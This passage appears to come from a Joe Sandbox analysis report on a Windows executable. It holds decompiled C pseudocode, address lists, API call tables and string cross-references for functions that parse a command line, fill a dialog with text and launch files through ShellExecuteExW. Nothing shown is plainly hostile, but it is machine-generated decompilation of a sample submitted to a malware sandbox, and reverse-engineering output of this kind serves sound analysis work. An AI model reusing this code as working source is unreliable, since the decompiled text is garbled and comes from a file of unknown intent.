														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E00E6E046(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E00E838B9(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E00E700D6(_t394 - 0x14c, 0xe938f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L00E8389E(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00E6DCEC(_t391, _t374, _t384);
						E00E6DCEC(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0xe9e5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}

0x00e6d601
0x00e6d601
0x00e6d606
0x00e6d610
0x00e6d61a
0x00e6d61b
0x00e6d61c
0x00e6d61f
0x00e6d621
0x00e6d624
0x00e6d627
0x00e6d62d
0x00e6d62f
0x00e6d632
0x00e6d638
0x00e6d674
0x00e6d63a
0x00e6d642
0x00e6d65a
0x00e6d664
0x00e6d664
0x00e6d67f
0x00e6d684
0x00e6d68c
0x00e6d68f
0x00e6d69d
0x00e6da60
0x00e6da66
0x00e6da71
0x00e6da7b
0x00e6d6a3
0x00e6d6a3
0x00e6d6a5
0x00e6d6ab
0x00e6d6c9
0x00e6d6d5
0x00e6d6e7
0x00e6d6ec
0x00e6d6ef
0x00e6d6f2
0x00e6d6f5
0x00e6d6f8
0x00e6d6fb
0x00e6d70f
0x00e6d724
0x00e6d729
0x00e6d72c
0x00e6d72e
0x00e6d72e
0x00e6d731
0x00e6d736
0x00e6d7f5
0x00e6d7f5
0x00e6d7f8
0x00e6d7fb
0x00e6d80c
0x00e6d814
0x00e6d815
0x00e6d818
0x00e6d81d
0x00000000
0x00000000
0x00e6d823
0x00e6d826
0x00000000
0x00000000
0x00000000
0x00e6d826
0x00000000
0x00e6d73c
0x00e6d744
0x00e6d76f
0x00e6d771
0x00e6d77a
0x00e6d7a5
0x00e6d7ad
0x00e6d7d9
0x00e6d7d9
0x00e6d7dd
0x00000000
0x00000000
0x00e6d7df
0x00000000
0x00e6d7b9
0x00e6d7c9
0x00e6d7ce
0x00e6d7d3
0x00000000
0x00000000
0x00000000
0x00e6d7d3
0x00e6d7ad
0x00e6d782
0x00e6d788
0x00e6d799
0x00e6d79e
0x00e6d7a3
0x00e6d7e7
0x00000000
0x00e6d7e7
0x00e6d7a3
0x00000000
0x00e6d750
0x00e6d760
0x00e6d765
0x00e6d76a
0x00e6d7eb
0x00e6d7eb
0x00e6d7ee
0x00e6d7f0
0x00000000
0x00e6d7f0
0x00e6d76c
0x00000000
0x00e6d76c
0x00e6d744
0x00e6d73c
0x00e6d835
0x00e6d838
0x00e6d83d
0x00e6d842
0x00e6d847
0x00e6d849
0x00e6d84d
0x00e6d84f
0x00000000
0x00000000
0x00e6d866
0x00e6d86b
0x00e6d86e
0x00e6d870
0x00e6d880
0x00e6d881
0x00e6d886
0x00e6d88a
0x00e6d88c
0x00000000
0x00000000
0x00e6d892
0x00e6d895
0x00e6d898
0x00e6d89c
0x00e6d8a2
0x00e6d8a7
0x00e6d8ab
0x00e6d8ae
0x00e6d8b1
0x00e6d8b1
0x00e6d8b6
0x00e6d8b8
0x00e6d8ba
0x00e6d8ba
0x00e6d8c0
0x00e6d8d0
0x00e6d8d5
0x00e6d8da
0x00e6d8df
0x00e6d8e3
0x00e6d8e5
0x00e6d8f3
0x00e6d8f7
0x00e6d8f9
0x00e6d8fb
0x00e6d8fe
0x00e6d904
0x00e6d906
0x00e6d909
0x00e6d9f1
0x00e6d9fd
0x00e6da05
0x00e6da0d
0x00e6da14
0x00e6da17
0x00e6da31
0x00e6da3e
0x00e6da46
0x00e6da58
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6da19
0x00e6da19
0x00e6da1d
0x00e6da26
0x00e6da2b
0x00e6da2c
0x00e6da2c
0x00000000
0x00e6da19
0x00e6d90f
0x00e6d916
0x00e6d91d
0x00e6d924
0x00e6d924
0x00e6d927
0x00e6d929
0x00e6dc3c
0x00e6dc3c
0x00e6dc40
0x00e6dc41
0x00e6dc44
0x00000000
0x00000000
0x00e6dc4a
0x00e6dc4e
0x00e6dca0
0x00e6dca1
0x00e6dca4
0x00e6dcca
0x00e6dcda
0x00e6dcdf
0x00e6dce5
0x00e6dce7
0x00e6dcc2
0x00e6dcc2
0x00000000
0x00e6dcc2
0x00e6dca8
0x00e6dca9
0x00e6dcac
0x00000000
0x00000000
0x00e6dcae
0x00e6dcae
0x00e6dcb4
0x00000000
0x00000000
0x00e6dcbd
0x00e6dcc1
0x00e6dcc1
0x00000000
0x00e6dcc1
0x00e6dc50
0x00e6dc56
0x00000000
0x00000000
0x00e6dc60
0x00e6dc60
0x00e6dc63
0x00e6dc8a
0x00e6dc8c
0x00e6dc8f
0x00e6dc90
0x00e6dc94
0x00e6dc95
0x00e6dc98
0x00000000
0x00e6dc98
0x00e6dc65
0x00e6dc65
0x00e6dc68
0x00e6dc86
0x00000000
0x00e6dc86
0x00e6dc6a
0x00e6dc6a
0x00e6dc6d
0x00e6dc82
0x00000000
0x00e6dc82
0x00e6dc6f
0x00e6dc6f
0x00e6dc72
0x00e6dc7e
0x00000000
0x00e6dc7e
0x00e6dc75
0x00e6dc78
0x00000000
0x00000000
0x00e6dc7a
0x00000000
0x00e6dc7a
0x00e6d92f
0x00e6d934
0x00e6d938
0x00e6d944
0x00e6d946
0x00e6d947
0x00e6d94b
0x00e6db40
0x00e6db43
0x00e6db4a
0x00e6db4f
0x00e6db51
0x00e6dc36
0x00e6dc36
0x00e6dc39
0x00000000
0x00e6dc39
0x00e6db63
0x00e6db74
0x00e6db79
0x00e6db7e
0x00e6db80
0x00000000
0x00000000
0x00e6db88
0x00e6db9b
0x00e6dbb0
0x00e6dbc5
0x00e6dbda
0x00e6dbf2
0x00e6dbf7
0x00e6dbfa
0x00e6dbfc
0x00e6dbfe
0x00e6dbfe
0x00e6dc01
0x00e6dc07
0x00e6dc07
0x00e6dc1a
0x00e6dc1a
0x00e6dc1c
0x00e6dc1f
0x00e6dc20
0x00e6dc20
0x00e6dc24
0x00e6dc27
0x00000000
0x00000000
0x00e6dc29
0x00e6dc29
0x00e6dc2d
0x00e6d9df
0x00e6d9df
0x00000000
0x00e6d9df
0x00e6dc33
0x00e6dc33
0x00e6dc20
0x00e6dc24
0x00e6dc27
0x00000000
0x00000000
0x00000000
0x00e6dc27
0x00e6dc20
0x00e6d951
0x00e6d954
0x00e6d954
0x00e6d957
0x00e6d95a
0x00e6d961
0x00e6d968
0x00e6d96f
0x00e6d976
0x00e6d979
0x00e6d98a
0x00e6d991
0x00e6d996
0x00e6d99b
0x00e6d99c
0x00e6d99e
0x00e6d9b6
0x00e6d9b6
0x00000000
0x00e6d9b6
0x00e6d9a3
0x00e6d9a5
0x00e6d9aa
0x00000000
0x00000000
0x00e6d9ac
0x00e6d9ae
0x00e6d9ae
0x00e6d9b1
0x00e6d9b9
0x00e6d9b9
0x00e6d9ba
0x00e6d9ba
0x00e6d9bf
0x00e6d9c2
0x00e6d9c4
0x00e6d9c6
0x00e6da7e
0x00e6da81
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6da87
0x00e6da87
0x00e6da87
0x00e6da8b
0x00e6da8e
0x00000000
0x00000000
0x00e6da90
0x00e6da90
0x00e6da94
0x00e6da99
0x00e6da9c
0x00e6daa1
0x00e6daa2
0x00e6daa4
0x00e6daa7
0x00e6dac8
0x00e6daca
0x00e6dae2
0x00e6dae7
0x00e6daea
0x00e6daed
0x00e6daf0
0x00e6db13
0x00e6db16
0x00e6db1b
0x00e6db1d
0x00e6db1d
0x00e6db33
0x00e6db38
0x00e6daf2
0x00e6dafe
0x00e6db06
0x00e6db0b
0x00e6db0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6daa9
0x00e6daa9
0x00e6daa9
0x00e6daac
0x00000000
0x00000000
0x00e6daae
0x00e6dab1
0x00e6dab4
0x00e6dabc
0x00e6dabf
0x00e6dac0
0x00e6dac3
0x00000000
0x00000000
0x00000000
0x00e6dac3
0x00e6dac5
0x00000000
0x00e6dac5
0x00e6da96
0x00e6da96
0x00e6da87
0x00e6da87
0x00e6da8b
0x00e6da8e
0x00000000
0x00000000
0x00000000
0x00e6da8e
0x00e6da87
0x00e6d9da
0x00000000
0x00e6d9da
0x00e6d93a
0x00e6d93a
0x00e6d93e
0x00000000
0x00000000
0x00000000
0x00e6d9e2
0x00e6d9e2
0x00e6d9e2
0x00e6d9eb
0x00e6d9ee
0x00000000
0x00e6d8e7
0x00e6d8e8
0x00000000
0x00e6d8ed
0x00e6d8e5
0x00e6d872
0x00e6d874
0x00000000
0x00000000
0x00000000
0x00000000
0x00e6d6ad
0x00e6d6ad
0x00e6d6b0
0x00e6d6b9
0x00e6d6be
0x00e6d6bf
0x00e6d6bf
0x00e6d6c7
0x00000000
0x00e6d6c7

APIs

__EH_prolog.LIBCMT ref: 00E6D606
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00E6D5E8,?), ref: 00E6D642
__fprintf_l.LIBCMT ref: 00E6DB33

Part of subcall function 00E71692: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E6B842,00000000,?,?,?,000202B6), ref: 00E716AE

Strings

RTL, xrefs: 00E6DAF8
$9, xrefs: 00E6D96F
, xrefs: 00E6D93A
*messages***, xrefs: 00E6D793
@%s:, xrefs: 00E6DB1D, 00E6DB29
$%s:, xrefs: 00E6DB16
,, xrefs: 00E6DB6E
R, xrefs: 00E6D7A5
a, xrefs: 00E6D7AF
*messages***, xrefs: 00E6D75A

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$$9$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 1867786338-2374907605
Opcode ID: d06f0430c99655a9ea9f4a7df05373b251f8051d38b16565edd65dbc42752423
Instruction ID: 0c7e4ba8ffbc521307838a70a0c252dd09200bffa49094514d2d7d00c66b75cf
Opcode Fuzzy Hash: d06f0430c99655a9ea9f4a7df05373b251f8051d38b16565edd65dbc42752423
Instruction Fuzzy Hash: 6412E271E482099ADF24EFA4EC45BEEB7B5FF54354F50606AF109B7281EBB09A40CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E7CE1E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E7CE1E() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00E7AF04();
				_t46 = GetDlgItem( *0xea8458, 0x68);
				_t49 =  *0xea8463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xea8440; // 0x0
					E00E78C2E(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xe935b4);
					 *0xea8463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x00e7ce25
0x00e7ce3f
0x00e7ce44
0x00e7ce4a
0x00e7ce4c
0x00e7ce52
0x00e7ce5a
0x00e7ce65
0x00e7ce73
0x00e7ce79
0x00e7ce79
0x00e7ce89
0x00e7ce93
0x00e7cea3
0x00e7ceab
0x00e7ceaf
0x00e7ceb4
0x00e7ceba
0x00e7cec5
0x00e7cecf
0x00e7ced7
0x00e7ced7
0x00e7cee7
0x00e7cef5
0x00e7cf04
0x00e7cf0c
0x00e7cf1a
0x00e7cf2b
0x00e7cf2b
0x00e7cf47

APIs

Part of subcall function 00E7AF04: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E7AF15
Part of subcall function 00E7AF04: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7AF26
Part of subcall function 00E7AF04: IsDialogMessageW.USER32(000202B6,?), ref: 00E7AF3A
Part of subcall function 00E7AF04: TranslateMessage.USER32(?), ref: 00E7AF48
Part of subcall function 00E7AF04: DispatchMessageW.USER32(?), ref: 00E7AF52

GetDlgItem.USER32(00000068,00EBECB0), ref: 00E7CE32
ShowWindow.USER32(00000000,00000005,?,?,?,00E7A8C2,00000001,?,?,00E7B15B,00E94F88,00EBECB0,00EBECB0,00001000,00000000,00000000), ref: 00E7CE5A
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E7CE65
SendMessageW.USER32(00000000,000000C2,00000000,00E935B4), ref: 00E7CE73
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E7CE89
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E7CEA3
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E7CEE7
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E7CEF5
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E7CF04
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E7CF2B
SendMessageW.USER32(00000000,000000C2,00000000,00E9431C), ref: 00E7CF3A

Strings

\, xrefs: 00E7CE93

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 6b3151c5c133710ec6d6ca2567901499af63970180ac164ae22ddd6bcc4cce6a
Instruction ID: 853d1716f355c779f5ddab5d8821233020cb3294f46bdf46b9750600bf26a44e
Opcode Fuzzy Hash: 6b3151c5c133710ec6d6ca2567901499af63970180ac164ae22ddd6bcc4cce6a
Instruction Fuzzy Hash: F331D371146740BFD3019F21DC49FAF7FACEB96704F04052CF761BA191CB66590A87A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D0DF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00E7D0DF(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t55;
				signed int _t58;
				signed short* _t59;
				long _t70;
				int _t79;
				intOrPtr _t82;
				signed int _t83;
				signed short* _t84;
				signed short _t85;
				long _t88;
				signed short* _t89;
				void* _t90;
				signed short* _t93;
				struct HWND__* _t95;
				void* _t96;
				void* _t97;
				void* _t100;

				_t96 = __ebp;
				_t55 = 0x1040;
				E00E7E630();
				_t93 = _a4168;
				_t79 = 0;
				if( *_t93 == 0) {
					L55:
					return _t55;
				}
				_t55 = E00E83883(_t93);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t88 = 0x3c;
					E00E7F5F0(_t88,  &_a4, 0, _t88);
					_t82 = _a4176;
					_t100 = _t100 + 0xc;
					_a4.cbSize = _t88;
					_a8 = 0x1c0;
					if(_t82 != 0) {
						_a8 = 0x5c0;
					}
					_t83 =  *_t93 & 0x0000ffff;
					_t89 =  &(_t93[1]);
					_push(_t96);
					_t97 = 0x22;
					if(_t83 != _t97) {
						_t89 = _t93;
					}
					_a20 = _t89;
					_t58 = _t79;
					if(_t83 == 0) {
						L13:
						_t59 = _a24;
						L14:
						if(_t59 == 0 ||  *_t59 == _t79) {
							if(_t82 == 0 &&  *0xeab472 != _t79) {
								_a24 = 0xeab472;
							}
						}
						_a32 = _a4172;
						_t90 = E00E6B683(_t89);
						if(_t90 != 0 && E00E71AC4(_t90, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00E6A373(_a20) != 0) {
							E00E6B429(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t55 = ShellExecuteExW( &_a4); // executed
						if(_t55 != 0) {
							_t95 = _a4160;
							if( *0xea9468 != _t79 || _a4172 != _t79 ||  *0xebec99 != _t79) {
								if(_t95 != 0) {
									_push(_t95);
									if( *0xec20b0() != 0) {
										ShowWindow(_t95, _t79);
										_t79 = 1;
									}
								}
								 *0xec20ac(_a56, 0x7d0);
								E00E7D5A3(_a48);
								if( *0xebec99 != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t70 = _v12;
									if(_t70 >  *0xebec9c) {
										 *0xebec9c = _t70;
									}
									 *0xebec9a = 1;
								}
							}
							CloseHandle(_a48);
							if(_t90 == 0 || E00E71AC4(_t90, L".exe") != 0) {
								_t55 = _a4164;
								if( *0xea9468 != 0 && _t55 == 0 &&  *0xebec99 == _t55) {
									 *0xebeca0 = 0x1b58;
								}
							} else {
								_t55 = _a4164;
							}
							if(_t79 != 0 && _t55 != 0) {
								_t55 = ShowWindow(_t95, 1);
							}
						}
						goto L55;
					}
					_t84 = _t93;
					_v0 = 0x20;
					do {
						if( *_t84 == _t97) {
							while(1) {
								_t58 = _t58 + 1;
								if(_t93[_t58] == _t79) {
									break;
								}
								if(_t93[_t58] == _t97) {
									_t85 = _v0;
									_t93[_t58] = _t85;
									L10:
									if(_t93[_t58] == _t85 ||  *((short*)(_t93 + 2 + _t58 * 2)) == 0x2f) {
										if(_t93[_t58] == _v0) {
											_t93[_t58] = 0;
										}
										_t59 =  &(_t93[_t58 + 1]);
										_a24 = _t59;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t85 = _v0;
						goto L10;
						L12:
						_t58 = _t58 + 1;
						_t84 =  &(_t93[_t58]);
					} while ( *_t84 != _t79);
					goto L13;
				}
			}

0x00e7d0df
0x00e7d0df
0x00e7d0e4
0x00e7d0eb
0x00e7d0f2
0x00e7d0f7
0x00e7d348
0x00e7d350
0x00e7d350
0x00e7d0fe
0x00e7d109
0x00000000
0x00e7d10f
0x00e7d112
0x00e7d11a
0x00e7d11f
0x00e7d126
0x00e7d129
0x00e7d12d
0x00e7d137
0x00e7d139
0x00e7d139
0x00e7d141
0x00e7d144
0x00e7d147
0x00e7d14a
0x00e7d14e
0x00e7d150
0x00e7d150
0x00e7d152
0x00e7d156
0x00e7d15b
0x00e7d193
0x00e7d193
0x00e7d197
0x00e7d19a
0x00e7d1a3
0x00e7d1ae
0x00e7d1ae
0x00e7d1a3
0x00e7d1be
0x00e7d1c7
0x00e7d1cb
0x00e7d1dc
0x00e7d1dc
0x00e7d1ef
0x00e7d1ff
0x00e7d208
0x00e7d208
0x00e7d211
0x00e7d219
0x00e7d21f
0x00e7d22c
0x00e7d241
0x00e7d243
0x00e7d24c
0x00e7d250
0x00e7d256
0x00e7d256
0x00e7d24c
0x00e7d261
0x00e7d26b
0x00e7d277
0x00e7d296
0x00e7d2a0
0x00e7d2a2
0x00e7d2a2
0x00e7d2a7
0x00e7d2a7
0x00e7d277
0x00e7d2b2
0x00e7d2ba
0x00e7d2d2
0x00e7d2d9
0x00e7d2e7
0x00e7d2e7
0x00e7d32f
0x00e7d32f
0x00e7d32f
0x00e7d338
0x00e7d341
0x00e7d341
0x00e7d338
0x00000000
0x00e7d347
0x00e7d15d
0x00e7d15f
0x00e7d167
0x00e7d16a
0x00e7d2f9
0x00e7d2f9
0x00e7d2fe
0x00000000
0x00000000
0x00e7d2f7
0x00e7d305
0x00e7d309
0x00e7d174
0x00e7d178
0x00e7d31a
0x00e7d31e
0x00e7d31e
0x00e7d323
0x00e7d326
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7d178
0x00e7d2f7
0x00e7d300
0x00e7d170
0x00000000
0x00e7d18a
0x00e7d18a
0x00e7d18b
0x00e7d18e
0x00000000
0x00e7d167

APIs

ShellExecuteExW.SHELL32(?), ref: 00E7D211
ShowWindow.USER32(?,00000000), ref: 00E7D250
GetExitCodeProcess.KERNEL32 ref: 00E7D28C
CloseHandle.KERNEL32(?), ref: 00E7D2B2
ShowWindow.USER32(?,00000001), ref: 00E7D341

Part of subcall function 00E71AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E6B250,?,?,?,00E6B1FE,?,-00000002,?,00000000,?), ref: 00E71ADA

Strings

.exe, xrefs: 00E7D2BC
, xrefs: 00E7D15F
.inf, xrefs: 00E7D1CD

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: f403bb3a3e0920ade3e714013589e32be749e1ef1cda5180aadbddfc3b408776
Instruction ID: f823b0d0c1804214fc387ec1a590df90096bb9e1733eafcaf2fc966f8d4d2e2b
Opcode Fuzzy Hash: f403bb3a3e0920ade3e714013589e32be749e1ef1cda5180aadbddfc3b408776
Instruction Fuzzy Hash: F561C4705093C0AED731DF25DC04AABBBF9AF95308F04A819E5C8B7162D771D989CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A368 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00E8A368(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00E8E9BC(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00E7EEFA(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00E8A5D0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00E8AA3C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00E8A5D0(_t101);
									goto L36;
								}
								_t62 = E00E8AA3C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00E8A5D0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00E88838(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00E91D00();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00E8AA3C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
